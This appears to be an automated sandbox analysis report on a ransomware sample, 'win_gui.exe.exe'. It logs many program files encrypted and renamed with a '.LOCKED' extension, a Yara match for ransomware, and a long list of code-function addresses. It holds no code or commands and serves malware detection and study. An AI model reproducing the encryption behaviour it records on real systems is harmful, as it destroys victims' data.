Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99045771948Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99159934858Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99078840226Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\StructureConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99737452337Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\Visa.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99517680179Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIConv.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99448116193Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIDiag.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99481562808Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIDlg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99462540804Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\UIAWrappers.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99857739081Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdiInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99358329738Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdiDC.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99074144487Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIIcons.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99270889863Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIFiles.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99794459845Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99099778931Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPILocale.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99074604893Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdi.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99895338604Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIMem.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99020650329Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIReg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9949211272Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIRes.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99555110701Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIShellEx.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99622405248Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIProc.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99764388598Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIShPath.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99567981423Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISysInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99313686346Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISys.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99775610723Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPITheme.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99557374793Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISysWin.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99711305012Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WindowsConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99434217727Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\word.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9952342039Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinNet.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99575948442Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.psd1.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99422765749Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99596249206Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99610253036Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\au3.keywords.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99795140846Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99902154825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.PowerShell.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99614236576Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99372272189Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99452665139Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\kms_host.vbs.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99647172437Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99708036048Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\bci.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99180664129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dt_shmem.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99386074145Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dt_socket.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99346543352Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\decora_sse.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99729730135Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dcpr.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99900005438Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\eula.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99871234052Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\fontmanager.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99929248295Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\fxplugins.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99880228439Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2pcsc.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99221480825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2gss.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99565348821Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\hprof.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99869626992Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\instrument.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99900760664Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\jaas_nt.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9924626937Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\glass.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99912284447Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2pkcs11.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99688769708Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\WindowsAccessBridge-32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99877932026Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99739131676Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\wsdetect.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99912356094Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\classlist.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9976421456Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfxswt.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9945329385Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jce.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99874378449Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\tzdb.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99835031009Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office 2013 - 2022 Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99945897134Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99945997682Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99732644656Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.accessmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99702663106Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99519123261Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99314755573Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99884632869Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99803539621Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.office64ww.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99927748311Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9985960587Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99805758117Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99369054916Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99399556194Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99936782695Jump to dropped file

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.win_gui.exe.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
Source: C:\Users\user\Desktop\win_gui.exe.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA0B90_2_005CA0B9
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C812D0_2_005C812D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CC7280_2_005CC728
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C67B60_2_005C67B6
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CABD10_2_005CABD1
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CECD90_2_005CECD9
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C74130_2_005C7413
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C55DF0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CB8A20_2_005CB8A2
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C1A4D0_2_005C1A4D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CBB5F0_2_005CBB5F
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C5D500_2_005C5D50
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005DE0100_2_005DE010
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060E0000_2_0060E000
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006160800_2_00616080
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006221500_2_00622150
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006081F00_2_006081F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006161900_2_00616190
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064C2700_2_0064C270
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064E2500_2_0064E250
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006162E00_2_006162E0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006122C00_2_006122C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006103600_2_00610360
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060A3700_2_0060A370
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006223700_2_00622370
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006143500_2_00614350
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006183500_2_00618350
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C43690_2_005C4369
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006243200_2_00624320
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006603C00_2_006603C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060E3D00_2_0060E3D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0063E3D00_2_0063E3D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005EA3800_2_005EA380
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C44080_2_005C4408
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006144000_2_00614400
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006084B00_2_006084B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060C4800_2_0060C480
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006065300_2_00606530
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060E5F00_2_0060E5F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006125D00_2_006125D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006146300_2_00614630
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006086C00_2_006086C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060C6A00_2_0060C6A0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006407600_2_00640760
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006107700_2_00610770
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006507100_2_00650710
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C87DD0_2_005C87DD
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006147F00_2_006147F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E87E00_2_005E87E0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E08000_2_005E0800
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006128100_2_00612810
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006089600_2_00608960
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060A9400_2_0060A940
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064C9C00_2_0064C9C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006109900_2_00610990
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060CA400_2_0060CA40
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00648A200_2_00648A20
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00614AF00_2_00614AF0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00616A900_2_00616A90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00612B600_2_00612B60
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00610B700_2_00610B70
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E8B000_2_005E8B00
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060AB800_2_0060AB80
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00608B900_2_00608B90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0063ECA00_2_0063ECA0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064EE200_2_0064EE20
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00612E300_2_00612E30
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C8E2E0_2_005C8E2E
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00614EE00_2_00614EE0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00604ED00_2_00604ED0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0063CEB00_2_0063CEB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00604FE00_2_00604FE0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006170600_2_00617060
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E90100_2_005E9010
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006110C00_2_006110C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0062F0D00_2_0062F0D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006130A00_2_006130A0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006190B00_2_006190B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F30800_2_005F3080
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005FD1100_2_005FD110
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060D1B00_2_0060D1B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0065F2400_2_0065F240
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C12840_2_005C1284
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006093700_2_00609370
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060D3C00_2_0060D3C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005FF3F00_2_005FF3F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006173D00_2_006173D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006133800_2_00613380
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064F4400_2_0064F440
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006154300_2_00615430
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005FB4D00_2_005FB4D0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006734C00_2_006734C0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006074A00_2_006074A0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006055100_2_00605510
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006175F00_2_006175F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0065F5F00_2_0065F5F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0066B5AA0_2_0066B5AA
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006075B00_2_006075B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C95850_2_005C9585
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006116400_2_00611640
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006156B00_2_006156B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0063D7700_2_0063D770
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060D7500_2_0060D750
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E57200_2_005E5720
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0066B7D90_2_0066B7D9
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060B7A00_2_0060B7A0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005F37900_2_005F3790
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006037B00_2_006037B0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006118400_2_00611840
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005FD8600_2_005FD860
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006158000_2_00615800
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006139000_2_00613900
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006239F00_2_006239F0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005D79800_2_005D7980
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_006319900_2_00631990
